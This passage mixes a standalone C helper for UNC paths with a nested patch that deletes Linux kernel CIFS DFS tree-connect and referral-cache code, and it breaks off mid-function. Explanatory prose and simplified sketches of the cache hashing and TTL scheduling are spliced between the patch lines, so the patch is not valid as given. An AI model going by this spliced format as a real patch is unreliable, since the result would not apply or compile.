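#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Return a copy of target that starts with a single '\', sized to
 * strlen(target) + 1 (copy + NUL) when target is already a "\\" UNC
 * path, or + sizeof("\\") == + 2 ('\' + copy + NUL) otherwise. */
static char *ensure_leading_backslash(const char *target)
{
	size_t len = strlen(target);
	char *refpath;

	if (len >= 2 && target[0] == '\\' && target[1] == '\\') {
		refpath = malloc(len + 1);
		if (refpath)
			snprintf(refpath, len + 1, "%s", target);
	} else {
		refpath = malloc(len + sizeof("\\"));
		if (refpath)
			snprintf(refpath, len + sizeof("\\"), "\\%s", target);
	}
	return refpath;	/* NULL on allocation failure */
}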
+-
+-static int target_share_matches_server(struct TCP_Server_Info *server, const char *tcp_host,
+-				       size_t tcp_host_len, char *share, bool *target_match)
+-{
+-	int rc = 0;
+-	const char *dfs_host;
+-	size_t dfs_host_len;
+-
+-	*target_match = true;
+-	extract_unc_hostname(share, &dfs_host, &dfs_host_len);
+-
+-	/* Check if hostnames or addresses match */
+-	if (dfs_host_len != tcp_host_len || strncasecmp(dfs_host, tcp_host, dfs_host_len) != 0) {
+-		cifs_dbg(FYI, "%s: %.*s doesn't match %.*s\n", __func__, (int)dfs_host_len,
+-			 dfs_host, (int)tcp_host_len, tcp_host);
+-		rc = match_target_ip(server, dfs_host, dfs_host_len, target_match);
+-		if (rc)
+-			cifs_dbg(VFS, "%s: failed to match target ip: %d\n", __func__, rc);
+-	}
+-	return rc;
+-}
+-
+-static int __tree_connect_dfs_target(const unsigned int xid, struct cifs_tcon *tcon,
+-				     struct cifs_sb_info *cifs_sb, char *tree, bool islink,
+-				     struct dfs_cache_tgt_list *tl)
+-{
+-	int rc;
+-	struct TCP_Server_Info *server = tcon->ses->server;
+-	const struct smb_version_operations *ops = server->ops;
+-	struct cifs_tcon *ipc = tcon->ses->tcon_ipc;
+-	char *share = NULL, *prefix = NULL;
+-	const char *tcp_host;
+-	size_t tcp_host_len;
+-	struct dfs_cache_tgt_iterator *tit;
+-	bool target_match;
+-
+-	extract_unc_hostname(server->hostname, &tcp_host, &tcp_host_len);
+-
+-	tit = dfs_cache_get_tgt_iterator(tl);
+-	if (!tit) {
+-		rc = -ENOENT;
+-		goto out;
+-	}
+-
+-	/* Try to tree connect to all dfs targets */
+-	for (; tit; tit = dfs_cache_get_next_tgt(tl, tit)) {
+-		const char *target = dfs_cache_get_tgt_name(tit);
+-		struct dfs_cache_tgt_list ntl = DFS_CACHE_TGT_LIST_INIT(ntl);
+-
+-		kfree(share);
+-		kfree(prefix);
+-		share = prefix = NULL;
+-
+-		/* Check if share matches with tcp ses */
+-		rc = dfs_cache_get_tgt_share(server->current_fullpath + 1, tit, &share, &prefix);
+-		if (rc) {
+-			cifs_dbg(VFS, "%s: failed to parse target share: %d\n", __func__, rc);
+-			break;
+-		}
+-
+-		rc = target_share_matches_server(server, tcp_host, tcp_host_len, share,
+-						 &target_match);
+-		if (rc)
+-			break;
+-		if (!target_match) {
+-			rc = -EHOSTUNREACH;
+-			continue;
+-		}
+-
+-		if (ipc->need_reconnect) {
+-			scnprintf(tree, MAX_TREE_SIZE, "\\\\%s\\IPC$", server->hostname);
+-			rc = ops->tree_connect(xid, ipc->ses, tree, ipc, cifs_sb->local_nls);
+-			if (rc)
+-				break;
+-		}
+-
+-		scnprintf(tree, MAX_TREE_SIZE, "\\%s", share);
+-		if (!islink) {
+-			rc = ops->tree_connect(xid, tcon->ses, tree, tcon, cifs_sb->local_nls);
+-			break;
+-		}
+-		/*
+-		 * If no dfs referrals were returned from the link target, then just do a
+-		 * TREE_CONNECT to it.  Otherwise, cache the dfs referral and then mark the
+-		 * current tcp ses for reconnect so that either the demultiplex thread or the
+-		 * echo worker will reconnect to the newly resolved target.
+-		 */
+-		if (dfs_cache_find(xid, tcon->ses, cifs_sb->local_nls, cifs_remap(cifs_sb), target,
+-				   NULL, &ntl)) {
+-			rc = ops->tree_connect(xid, tcon->ses, tree, tcon, cifs_sb->local_nls);
+-			if (rc)
+-				continue;
+-			rc = dfs_cache_noreq_update_tgthint(server->current_fullpath + 1, tit);
+-			if (!rc)
+-				rc = cifs_update_super_prepath(cifs_sb, prefix);
+-		} else {
+-			/* Target is another dfs share */
+-			rc = update_server_fullpath(server, cifs_sb, target);
+-			dfs_cache_free_tgts(tl);
+-
+-			if (!rc) {
+-				rc = -EREMOTE;
+-				list_replace_init(&ntl.tl_list, &tl->tl_list);
+-			} else
+-				dfs_cache_free_tgts(&ntl);
+-		}
+-		break;
+-	}
+-
+-out:
+-	kfree(share);
+-	kfree(prefix);
+-
+-	return rc;
+-}
+-
+-static int tree_connect_dfs_target(const unsigned int xid, struct cifs_tcon *tcon,
+-				   struct cifs_sb_info *cifs_sb, char *tree, bool islink,
+-				   struct dfs_cache_tgt_list *tl)
+-{
+-	int rc;
+-	int num_links = 0;
+-	struct TCP_Server_Info *server = tcon->ses->server;
+-
+-	do {
+-		rc = __tree_connect_dfs_target(xid, tcon, cifs_sb, tree, islink, tl);
+-		if (!rc || rc != -EREMOTE)
+-			break;
+-	} while (rc = -ELOOP, ++num_links < MAX_NESTED_LINKS);
+-	/*
+-	 * If we couldn't tree connect to any targets from the last referral path, then
+-	 * retry from the original referral path.
+-	 */
+-	if (rc && server->current_fullpath != server->origin_fullpath) {
+-		server->current_fullpath = server->origin_fullpath;
+-		cifs_signal_cifsd_for_reconnect(server, true);
+-	}
+-
+-	dfs_cache_free_tgts(tl);
+-	return rc;
+-}
+-
+-int cifs_tree_connect(const unsigned int xid, struct cifs_tcon *tcon, const struct nls_table *nlsc)
+-{
+-	int rc;
+-	struct TCP_Server_Info *server = tcon->ses->server;
+-	const struct smb_version_operations *ops = server->ops;
+-	struct super_block *sb = NULL;
+-	struct cifs_sb_info *cifs_sb;
+-	struct dfs_cache_tgt_list tl = DFS_CACHE_TGT_LIST_INIT(tl);
+-	char *tree;
+-	struct dfs_info3_param ref = {0};
+-
+-	/* only send once per connect */
+-	spin_lock(&tcon->tc_lock);
+-	if (tcon->ses->ses_status != SES_GOOD ||
+-	    (tcon->status != TID_NEW &&
+-	    tcon->status != TID_NEED_TCON)) {
+-		spin_unlock(&tcon->tc_lock);
+-		return 0;
+-	}
+-	tcon->status = TID_IN_TCON;
+-	spin_unlock(&tcon->tc_lock);
+-
+-	tree = kzalloc(MAX_TREE_SIZE, GFP_KERNEL);
+-	if (!tree) {
+-		rc = -ENOMEM;
+-		goto out;
+-	}
+-
+-	if (tcon->ipc) {
+-		scnprintf(tree, MAX_TREE_SIZE, "\\\\%s\\IPC$", server->hostname);
+-		rc = ops->tree_connect(xid, tcon->ses, tree, tcon, nlsc);
+-		goto out;
+-	}
+-
+-	sb = cifs_get_tcp_super(server);
+-	if (IS_ERR(sb)) {
+-		rc = PTR_ERR(sb);
+-		cifs_dbg(VFS, "%s: could not find superblock: %d\n", __func__, rc);
+-		goto out;
+-	}
+-
+-	cifs_sb = CIFS_SB(sb);
+-
+-	/* If it is not dfs or there was no cached dfs referral, then reconnect to same share */
+-	if (!server->current_fullpath ||
+-	    dfs_cache_noreq_find(server->current_fullpath + 1, &ref, &tl)) {
+-		rc = ops->tree_connect(xid, tcon->ses, tcon->tree_name, tcon, cifs_sb->local_nls);
+-		goto out;
+-	}
+-
+-	rc = tree_connect_dfs_target(xid, tcon, cifs_sb, tree, ref.server_type == DFS_TYPE_LINK,
+-				     &tl);
+-	free_dfs_info_param(&ref);
+-
+-out:
+-	kfree(tree);
+-	cifs_put_tcp_super(sb);
+-
+-	if (rc) {
+-		spin_lock(&tcon->tc_lock);
+-		if (tcon->status == TID_IN_TCON)
+-			tcon->status = TID_NEED_TCON;
+-		spin_unlock(&tcon->tc_lock);
+-	} else {
+-		spin_lock(&tcon->tc_lock);
+-		if (tcon->status == TID_IN_TCON)
+-			tcon->status = TID_GOOD;
+-		spin_unlock(&tcon->tc_lock);
+-		tcon->need_reconnect = false;
+-	}
+-
+-	return rc;
+-}
+-#else
+-int cifs_tree_connect(const unsigned int xid, struct cifs_tcon *tcon, const struct nls_table *nlsc)
+-{
+-	int rc;
+-	const struct smb_version_operations *ops = tcon->ses->server->ops;
+-
+-	/* only send once per connect */
+-	spin_lock(&tcon->tc_lock);
+-	if (tcon->ses->ses_status != SES_GOOD ||
+-	    (tcon->status != TID_NEW &&
+-	    tcon->status != TID_NEED_TCON)) {
+-		spin_unlock(&tcon->tc_lock);
+-		return 0;
+-	}
+-	tcon->status = TID_IN_TCON;
+-	spin_unlock(&tcon->tc_lock);
+-
+-	rc = ops->tree_connect(xid, tcon->ses, tcon->tree_name, tcon, nlsc);
+-	if (rc) {
+-		spin_lock(&tcon->tc_lock);
+-		if (tcon->status == TID_IN_TCON)
+-			tcon->status = TID_NEED_TCON;
+-		spin_unlock(&tcon->tc_lock);
+-	} else {
+-		spin_lock(&tcon->tc_lock);
+-		if (tcon->status == TID_IN_TCON)
+-			tcon->status = TID_GOOD;
+-		tcon->need_reconnect = false;
+-		spin_unlock(&tcon->tc_lock);
+-	}
+-
+-	return rc;
+-}
+-#endif
+diff --git a/fs/cifs/dfs_cache.c b/fs/cifs/dfs_cache.c
+deleted file mode 100644
+index 3bc1d3494be3a..0000000000000
+--- a/fs/cifs/dfs_cache.c
++++ /dev/null
+@@ -1,1690 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0
+-/*
+- * DFS referral cache routines
+- *
+- * Copyright (c) 2018-2019 Paulo Alcantara <palcantara@suse.de>
+- */
+-
+-#include <linux/jhash.h>
+-#include <linux/ktime.h>
+-#include <linux/slab.h>
+-#include <linux/proc_fs.h>
+-#include <linux/nls.h>
+-#include <linux/workqueue.h>
+-#include <linux/uuid.h>
+-#include "cifsglob.h"
+-#include "smb2pdu.h"
+-#include "smb2proto.h"
+-#include "cifsproto.h"
+-#include "cifs_debug.h"
+-#include "cifs_unicode.h"
+-#include "smb2glob.h"
+-#include "dns_resolve.h"
+-
+-#include "dfs_cache.h"
+-
+-#define CACHE_HTABLE_SIZE 32
+-#define CACHE_MAX_ENTRIES 64
+-#define CACHE_MIN_TTL 120 /* 2 minutes */
+-
+-#define IS_DFS_INTERLINK(v) (((v) & DFSREF_REFERRAL_SERVER) && !((v) & DFSREF_STORAGE_SERVER))
+-
+-struct cache_dfs_tgt {
+-	char *name;
+-	int path_consumed;
+-	struct list_head list;
+-};
+-
+-struct cache_entry {
+-	struct hlist_node hlist;
+-	const char *path;
+-	int hdr_flags; /* RESP_GET_DFS_REFERRAL.ReferralHeaderFlags */
+-	int ttl; /* DFS_REREFERRAL_V3.TimeToLive */
+-	int srvtype; /* DFS_REREFERRAL_V3.ServerType */
+-	int ref_flags; /* DFS_REREFERRAL_V3.ReferralEntryFlags */
+-	struct timespec64 etime;
+-	int path_consumed; /* RESP_GET_DFS_REFERRAL.PathConsumed */
+-	int numtgts;
+-	struct list_head tlist;
+-	struct cache_dfs_tgt *tgthint;
+-};
+-
+-/* List of referral server sessions per dfs mount */
+-struct mount_group {
+-	struct list_head list;
+-	uuid_t id;
+-	struct cifs_ses *sessions[CACHE_MAX_ENTRIES];
+-	int num_sessions;
+-	spinlock_t lock;
+-	struct list_head refresh_list;
+-	struct kref refcount;
+-};
+-
+-static struct kmem_cache *cache_slab __read_mostly;
+-static struct workqueue_struct *dfscache_wq __read_mostly;
+-
+-static int cache_ttl;
+-static DEFINE_SPINLOCK(cache_ttl_lock);
+-
+-static struct nls_table *cache_cp;
+-
+-/*
+- * Number of entries in the cache
+- */
+-static atomic_t cache_count;
+-
+-static struct hlist_head cache_htable[CACHE_HTABLE_SIZE];
+-static DECLARE_RWSEM(htable_rw_lock);
+-
+-static LIST_HEAD(mount_group_list);
+-static DEFINE_MUTEX(mount_group_list_lock);
+-
+-static void refresh_cache_worker(struct work_struct *work);
+-
+-static DECLARE_DELAYED_WORK(refresh_task, refresh_cache_worker);
+-
+-static void get_ipc_unc(const char *ref_path, char *ipc, size_t ipclen)
+-{
+-	const char *host;
+-	size_t len;
+-
+-	extract_unc_hostname(ref_path, &host, &len);
+-	scnprintf(ipc, ipclen, "\\\\%.*s\\IPC$", (int)len, host);
+-}
+-
+-static struct cifs_ses *find_ipc_from_server_path(struct cifs_ses **ses, const char *path)
+-{
+-	char unc[SERVER_NAME_LENGTH + sizeof("//x/IPC$")] = {0};
+-
+-	get_ipc_unc(path, unc, sizeof(unc));
+-	for (; *ses; ses++) {
+-		if (!strcasecmp(unc, (*ses)->tcon_ipc->tree_name))
+-			return *ses;
+-	}
+-	return ERR_PTR(-ENOENT);
+-}
+-
+-static void __mount_group_release(struct mount_group *mg)
+-{
+-	int i;
+-
+-	for (i = 0; i < mg->num_sessions; i++)
+-		cifs_put_smb_ses(mg->sessions[i]);
+-	kfree(mg);
+-}
+-
+-static void mount_group_release(struct kref *kref)
+-{
+-	struct mount_group *mg = container_of(kref, struct mount_group, refcount);
+-
+-	mutex_lock(&mount_group_list_lock);
+-	list_del(&mg->list);
+-	mutex_unlock(&mount_group_list_lock);
+-	__mount_group_release(mg);
+-}
+-
+-static struct mount_group *find_mount_group_locked(const uuid_t *id)
+-{
+-	struct mount_group *mg;
+-
+-	list_for_each_entry(mg, &mount_group_list, list) {
+-		if (uuid_equal(&mg->id, id))
+-			return mg;
+-	}
+-	return ERR_PTR(-ENOENT);
+-}
+-
+-static struct mount_group *__get_mount_group_locked(const uuid_t *id)
+-{
+-	struct mount_group *mg;
+-
+-	mg = find_mount_group_locked(id);
+-	if (!IS_ERR(mg))
+-		return mg;
+-
+-	mg = kmalloc(sizeof(*mg), GFP_KERNEL);
+-	if (!mg)
+-		return ERR_PTR(-ENOMEM);
+-	kref_init(&mg->refcount);
+-	uuid_copy(&mg->id, id);
+-	mg->num_sessions = 0;
+-	spin_lock_init(&mg->lock);
+-	list_add(&mg->list, &mount_group_list);
+-	return mg;
+-}
+-
+-static struct mount_group *get_mount_group(const uuid_t *id)
+-{
+-	struct mount_group *mg;
+-
+-	mutex_lock(&mount_group_list_lock);
+-	mg = __get_mount_group_locked(id);
+-	if (!IS_ERR(mg))
+-		kref_get(&mg->refcount);
+-	mutex_unlock(&mount_group_list_lock);
+-
+-	return mg;
+-}
+-
+-static void free_mount_group_list(void)
+-{
+-	struct mount_group *mg, *tmp_mg;
+-
+-	list_for_each_entry_safe(mg, tmp_mg, &mount_group_list, list) {
+-		list_del_init(&mg->list);
+-		__mount_group_release(mg);
+-	}
+-}
+-
+-/**
+- * dfs_cache_canonical_path - get a canonical DFS path
+- *
+- * @path: DFS path
+- * @cp: codepage
+- * @remap: mapping type
+- *
+- * Return canonical path if success, otherwise error.
+- */
+-char *dfs_cache_canonical_path(const char *path, const struct nls_table *cp, int remap)
+-{
+-	char *tmp;
+-	int plen = 0;
+-	char *npath;
+-
+-	if (!path || strlen(path) < 3 || (*path != '\\' && *path != '/'))
+-		return ERR_PTR(-EINVAL);
+-
+-	if (unlikely(strcmp(cp->charset, cache_cp->charset))) {
+-		tmp = (char *)cifs_strndup_to_utf16(path, strlen(path), &plen, cp, remap);
+-		if (!tmp) {
+-			cifs_dbg(VFS, "%s: failed to convert path to utf16\n", __func__);
+-			return ERR_PTR(-EINVAL);
+-		}
+-
+-		npath = cifs_strndup_from_utf16(tmp, plen, true, cache_cp);
+-		kfree(tmp);
+-
+-		if (!npath) {
+-			cifs_dbg(VFS, "%s: failed to convert path from utf16\n", __func__);
+-			return ERR_PTR(-EINVAL);
+-		}
+-	} else {
+-		npath = kstrdup(path, GFP_KERNEL);
+-		if (!npath)
+-			return ERR_PTR(-ENOMEM);
+-	}
+-	convert_delimiter(npath, '\\');
+-	return npath;
+-}
+-
+-static inline bool cache_entry_expired(const struct cache_entry *ce)
+-{
+-	struct timespec64 ts;
+-
+-	ktime_get_coarse_real_ts64(&ts);
+-	return timespec64_compare(&ts, &ce->etime) >= 0;
+-}
+-
+-static inline void free_tgts(struct cache_entry *ce)
+-{
+-	struct cache_dfs_tgt *t, *n;
+-
+-	list_for_each_entry_safe(t, n, &ce->tlist, list) {
+-		list_del(&t->list);
+-		kfree(t->name);
+-		kfree(t);
+-	}
+-}
+-
+-static inline void flush_cache_ent(struct cache_entry *ce)
+-{
+-	hlist_del_init(&ce->hlist);
+-	kfree(ce->path);
+-	free_tgts(ce);
+-	atomic_dec(&cache_count);
+-	kmem_cache_free(cache_slab, ce);
+-}
+-
+-static void flush_cache_ents(void)
+-{
+-	int i;
+-
+-	for (i = 0; i < CACHE_HTABLE_SIZE; i++) {
+-		struct hlist_head *l = &cache_htable[i];
+-		struct hlist_node *n;
+-		struct cache_entry *ce;
+-
+-		hlist_for_each_entry_safe(ce, n, l, hlist) {
+-			if (!hlist_unhashed(&ce->hlist))
+-				flush_cache_ent(ce);
+-		}
+-	}
+-}
+-
+-/*
+- * dfs cache /proc file
+- */
+-static int dfscache_proc_show(struct seq_file *m, void *v)
+-{
+-	int i;
+-	struct cache_entry *ce;
+-	struct cache_dfs_tgt *t;
+-
+-	seq_puts(m, "DFS cache\n---------\n");
+-
+-	down_read(&htable_rw_lock);
+-	for (i = 0; i < CACHE_HTABLE_SIZE; i++) {
+-		struct hlist_head *l = &cache_htable[i];
+-
+-		hlist_for_each_entry(ce, l, hlist) {
+-			if (hlist_unhashed(&ce->hlist))
+-				continue;
+-
+-			seq_printf(m,
+-				   "cache entry: path=%s,type=%s,ttl=%d,etime=%ld,hdr_flags=0x%x,ref_flags=0x%x,interlink=%s,path_consumed=%d,expired=%s\n",
+-				   ce->path, ce->srvtype == DFS_TYPE_ROOT ? "root" : "link",
+-				   ce->ttl, ce->etime.tv_nsec, ce->hdr_flags, ce->ref_flags,
+-				   IS_DFS_INTERLINK(ce->hdr_flags) ? "yes" : "no",
+-				   ce->path_consumed, cache_entry_expired(ce) ? "yes" : "no");
+-
+-			list_for_each_entry(t, &ce->tlist, list) {
+-				seq_printf(m, "  %s%s\n",
+-					   t->name,
+-					   ce->tgthint == t ? " (target hint)" : "");
+-			}
+-		}
+-	}
+-	up_read(&htable_rw_lock);
+-
+-	return 0;
+-}
+-
+-static ssize_t dfscache_proc_write(struct file *file, const char __user *buffer,
+-				   size_t count, loff_t *ppos)
+-{
+-	char c;
+-	int rc;
+-
+-	rc = get_user(c, buffer);
+-	if (rc)
+-		return rc;
+-
+-	if (c != '0')
+-		return -EINVAL;
+-
+-	cifs_dbg(FYI, "clearing dfs cache\n");
+-
+-	down_write(&htable_rw_lock);
+-	flush_cache_ents();
+-	up_write(&htable_rw_lock);
+-
+-	return count;
+-}
+-
+-static int dfscache_proc_open(struct inode *inode, struct file *file)
+-{
+-	return single_open(file, dfscache_proc_show, NULL);
+-}
+-
+-const struct proc_ops dfscache_proc_ops = {
+-	.proc_open	= dfscache_proc_open,
+-	.proc_read	= seq_read,
+-	.proc_lseek	= seq_lseek,
+-	.proc_release	= single_release,
+-	.proc_write	= dfscache_proc_write,
+-};
+-
+-#ifdef CONFIG_CIFS_DEBUG2
+-static inline void dump_tgts(const struct cache_entry *ce)
+-{
+-	struct cache_dfs_tgt *t;
+-
+-	cifs_dbg(FYI, "target list:\n");
+-	list_for_each_entry(t, &ce->tlist, list) {
+-		cifs_dbg(FYI, "  %s%s\n", t->name,
+-			 ce->tgthint == t ? " (target hint)" : "");
+-	}
+-}
+-
+-static inline void dump_ce(const struct cache_entry *ce)
+-{
+-	cifs_dbg(FYI, "cache entry: path=%s,type=%s,ttl=%d,etime=%ld,hdr_flags=0x%x,ref_flags=0x%x,interlink=%s,path_consumed=%d,expired=%s\n",
+-		 ce->path,
+-		 ce->srvtype == DFS_TYPE_ROOT ? "root" : "link", ce->ttl,
+-		 ce->etime.tv_nsec,
+-		 ce->hdr_flags, ce->ref_flags,
+-		 IS_DFS_INTERLINK(ce->hdr_flags) ? "yes" : "no",
+-		 ce->path_consumed,
+-		 cache_entry_expired(ce) ? "yes" : "no");
+-	dump_tgts(ce);
+-}
+-
+-static inline void dump_refs(const struct dfs_info3_param *refs, int numrefs)
+-{
+-	int i;
+-
+-	cifs_dbg(FYI, "DFS referrals returned by the server:\n");
+-	for (i = 0; i < numrefs; i++) {
+-		const struct dfs_info3_param *ref = &refs[i];
+-
+-		cifs_dbg(FYI,
+-			 "\n"
+-			 "flags:         0x%x\n"
+-			 "path_consumed: %d\n"
+-			 "server_type:   0x%x\n"
+-			 "ref_flag:      0x%x\n"
+-			 "path_name:     %s\n"
+-			 "node_name:     %s\n"
+-			 "ttl:           %d (%dm)\n",
+-			 ref->flags, ref->path_consumed, ref->server_type,
+-			 ref->ref_flag, ref->path_name, ref->node_name,
+-			 ref->ttl, ref->ttl / 60);
+-	}
+-}
+-#else
+-#define dump_tgts(e)
+-#define dump_ce(e)
+-#define dump_refs(r, n)
+-#endif
+-
+-/**
+- * dfs_cache_init - Initialize DFS referral cache.
+- *
+- * Return zero if initialized successfully, otherwise non-zero.
+- */
+-int dfs_cache_init(void)
+-{
+-	int rc;
+-	int i;
+-
+-	dfscache_wq = alloc_workqueue("cifs-dfscache", WQ_FREEZABLE | WQ_UNBOUND, 1);
+-	if (!dfscache_wq)
+-		return -ENOMEM;
+-
+-	cache_slab = kmem_cache_create("cifs_dfs_cache",
+-				       sizeof(struct cache_entry), 0,
+-				       SLAB_HWCACHE_ALIGN, NULL);
+-	if (!cache_slab) {
+-		rc = -ENOMEM;
+-		goto out_destroy_wq;
+-	}
+-
+-	for (i = 0; i < CACHE_HTABLE_SIZE; i++)
+-		INIT_HLIST_HEAD(&cache_htable[i]);
+-
+-	atomic_set(&cache_count, 0);
+-	cache_cp = load_nls("utf8");
+-	if (!cache_cp)
+-		cache_cp = load_nls_default();
+-
+-	cifs_dbg(FYI, "%s: initialized DFS referral cache\n", __func__);
+-	return 0;
+-
+-out_destroy_wq:
+-	destroy_workqueue(dfscache_wq);
+-	return rc;
+-}
+-
+-static int cache_entry_hash(const void *data, int size, unsigned int *hash)
+-{
+-	int i, clen;
+-	const unsigned char *s = data;
+-	wchar_t c;
+-	unsigned int h = 0;
+-
+-	for (i = 0; i < size; i += clen) {
+-		clen = cache_cp->char2uni(&s[i], size - i, &c);
+-		if (unlikely(clen < 0)) {
+-			cifs_dbg(VFS, "%s: can't convert char\n", __func__);
+-			return clen;
+-		}
+-		c = cifs_toupper(c);
+-		h = jhash(&c, sizeof(c), h);
+-	}
+-	*hash = h % CACHE_HTABLE_SIZE;
+-	return 0;
+-}
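
The hashing above walks the path one (possibly multi-byte) character at a time via cache_cp->char2uni(), upper-cases each character, and feeds it to jhash() so lookups are case-insensitive. A simplified standalone sketch of that idea, assuming plain ASCII and a toy multiplicative hash in place of jhash():

#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define CACHE_HTABLE_SIZE 32

/* Case-insensitive hash of a path, folded into the table size. */
static unsigned int path_hash(const char *s, size_t len)
{
	unsigned int h = 0;
	size_t i;

	for (i = 0; i < len; i++)
		h = h * 31 + toupper((unsigned char)s[i]);
	return h % CACHE_HTABLE_SIZE;
}

int main(void)
{
	/* Differently-cased spellings land in the same bucket. */
	printf("%u %u\n",
	       path_hash("\\DOM\\dfsroot", 12),
	       path_hash("\\dom\\DFSROOT", 12));
	return 0;
}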
+-
+-/* Return target hint of a DFS cache entry */
+-static inline char *get_tgt_name(const struct cache_entry *ce)
+-{
+-	struct cache_dfs_tgt *t = ce->tgthint;
+-
+-	return t ? t->name : ERR_PTR(-ENOENT);
+-}
+-
+-/* Return expire time out of a new entry's TTL */
+-static inline struct timespec64 get_expire_time(int ttl)
+-{
+-	struct timespec64 ts = {
+-		.tv_sec = ttl,
+-		.tv_nsec = 0,
+-	};
+-	struct timespec64 now;
+-
+-	ktime_get_coarse_real_ts64(&now);
+-	return timespec64_add(now, ts);
+-}
+-
+-/* Allocate a new DFS target */
+-static struct cache_dfs_tgt *alloc_target(const char *name, int path_consumed)
+-{
+-	struct cache_dfs_tgt *t;
+-
+-	t = kmalloc(sizeof(*t), GFP_ATOMIC);
+-	if (!t)
+-		return ERR_PTR(-ENOMEM);
+-	t->name = kstrdup(name, GFP_ATOMIC);
+-	if (!t->name) {
+-		kfree(t);
+-		return ERR_PTR(-ENOMEM);
+-	}
+-	t->path_consumed = path_consumed;
+-	INIT_LIST_HEAD(&t->list);
+-	return t;
+-}
+-
+-/*
+- * Copy DFS referral information to a cache entry and conditionally update
+- * target hint.
+- */
+-static int copy_ref_data(const struct dfs_info3_param *refs, int numrefs,
+-			 struct cache_entry *ce, const char *tgthint)
+-{
+-	int i;
+-
+-	ce->ttl = max_t(int, refs[0].ttl, CACHE_MIN_TTL);
+-	ce->etime = get_expire_time(ce->ttl);
+-	ce->srvtype = refs[0].server_type;
+-	ce->hdr_flags = refs[0].flags;
+-	ce->ref_flags = refs[0].ref_flag;
+-	ce->path_consumed = refs[0].path_consumed;
+-
+-	for (i = 0; i < numrefs; i++) {
+-		struct cache_dfs_tgt *t;
+-
+-		t = alloc_target(refs[i].node_name, refs[i].path_consumed);
+-		if (IS_ERR(t)) {
+-			free_tgts(ce);
+-			return PTR_ERR(t);
+-		}
+-		if (tgthint && !strcasecmp(t->name, tgthint)) {
+-			list_add(&t->list, &ce->tlist);
+-			tgthint = NULL;
+-		} else {
+-			list_add_tail(&t->list, &ce->tlist);
+-		}
+-		ce->numtgts++;
+-	}
+-
+-	ce->tgthint = list_first_entry_or_null(&ce->tlist,
+-					       struct cache_dfs_tgt, list);
+-
+-	return 0;
+-}
+-
+-/* Allocate a new cache entry */
+-static struct cache_entry *alloc_cache_entry(struct dfs_info3_param *refs, int numrefs)
+-{
+-	struct cache_entry *ce;
+-	int rc;
+-
+-	ce = kmem_cache_zalloc(cache_slab, GFP_KERNEL);
+-	if (!ce)
+-		return ERR_PTR(-ENOMEM);
+-
+-	ce->path = refs[0].path_name;
+-	refs[0].path_name = NULL;
+-
+-	INIT_HLIST_NODE(&ce->hlist);
+-	INIT_LIST_HEAD(&ce->tlist);
+-
+-	rc = copy_ref_data(refs, numrefs, ce, NULL);
+-	if (rc) {
+-		kfree(ce->path);
+-		kmem_cache_free(cache_slab, ce);
+-		ce = ERR_PTR(rc);
+-	}
+-	return ce;
+-}
+-
+-static void remove_oldest_entry_locked(void)
+-{
+-	int i;
+-	struct cache_entry *ce;
+-	struct cache_entry *to_del = NULL;
+-
+-	WARN_ON(!rwsem_is_locked(&htable_rw_lock));
+-
+-	for (i = 0; i < CACHE_HTABLE_SIZE; i++) {
+-		struct hlist_head *l = &cache_htable[i];
+-
+-		hlist_for_each_entry(ce, l, hlist) {
+-			if (hlist_unhashed(&ce->hlist))
+-				continue;
+-			if (!to_del || timespec64_compare(&ce->etime,
+-							  &to_del->etime) < 0)
+-				to_del = ce;
+-		}
+-	}
+-
+-	if (!to_del) {
+-		cifs_dbg(FYI, "%s: no entry to remove\n", __func__);
+-		return;
+-	}
+-
+-	cifs_dbg(FYI, "%s: removing entry\n", __func__);
+-	dump_ce(to_del);
+-	flush_cache_ent(to_del);
+-}
+-
+-/* Add a new DFS cache entry */
+-static int add_cache_entry_locked(struct dfs_info3_param *refs, int numrefs)
+-{
+-	int rc;
+-	struct cache_entry *ce;
+-	unsigned int hash;
+-
+-	WARN_ON(!rwsem_is_locked(&htable_rw_lock));
+-
+-	if (atomic_read(&cache_count) >= CACHE_MAX_ENTRIES) {
+-		cifs_dbg(FYI, "%s: reached max cache size (%d)\n", __func__, CACHE_MAX_ENTRIES);
+-		remove_oldest_entry_locked();
+-	}
+-
+-	rc = cache_entry_hash(refs[0].path_name, strlen(refs[0].path_name), &hash);
+-	if (rc)
+-		return rc;
+-
+-	ce = alloc_cache_entry(refs, numrefs);
+-	if (IS_ERR(ce))
+-		return PTR_ERR(ce);
+-
+-	spin_lock(&cache_ttl_lock);
+-	if (!cache_ttl) {
+-		cache_ttl = ce->ttl;
+-		queue_delayed_work(dfscache_wq, &refresh_task, cache_ttl * HZ);
+-	} else {
+-		cache_ttl = min_t(int, cache_ttl, ce->ttl);
+-		mod_delayed_work(dfscache_wq, &refresh_task, cache_ttl * HZ);
+-	}
+-	spin_unlock(&cache_ttl_lock);
+-
+-	hlist_add_head(&ce->hlist, &cache_htable[hash]);
+-	dump_ce(ce);
+-
+-	atomic_inc(&cache_count);
+-
+-	return 0;
+-}
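
Note the scheduling rule in the middle of the function: a single delayed worker is kept armed at the smallest TTL seen across all cache entries, so the refresher always wakes in time for the earliest expiry. A toy sketch of that policy (the scheduler stub is hypothetical, standing in for queue_delayed_work()/mod_delayed_work()):

#include <stdio.h>

static int cache_ttl;	/* 0 == nothing scheduled yet */

/* Stand-in for (mod_)queue_delayed_work() on the refresh worker. */
static void schedule_refresh(int secs)
{
	printf("refresh worker armed for %d seconds\n", secs);
}

/* Called whenever a new cache entry with the given TTL is added. */
static void note_new_entry_ttl(int ttl)
{
	if (!cache_ttl || ttl < cache_ttl)
		cache_ttl = ttl;	/* keep the smallest TTL seen */
	schedule_refresh(cache_ttl);
}

int main(void)
{
	note_new_entry_ttl(300);	/* armed for 300s */
	note_new_entry_ttl(120);	/* re-armed for 120s */
	note_new_entry_ttl(600);	/* stays at 120s */
	return 0;
}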
+-
+-/* Check if two DFS paths are equal.  @s1 and @s2 are expected to be in @cache_cp's charset */
+-static bool dfs_path_equal(const char *s1, int len1, const char *s2, int len2)
+-{
+-	int i, l1, l2;
+-	wchar_t c1, c2;
+-
+-	if (len1 != len2)
+-		return false;
+-
+-	for (i = 0; i < len1; i += l1) {
+-		l1 = cache_cp->char2uni(&s1[i], len1 - i, &c1);
+-		l2 = cache_cp->char2uni(&s2[i], len2 - i, &c2);
+-		if (unlikely(l1 < 0 && l2 < 0)) {
+-			if (s1[i] != s2[i])
+-				return false;
+-			l1 = 1;
+-			continue;
+-		}
+-		if (l1 != l2)
+-			return false;
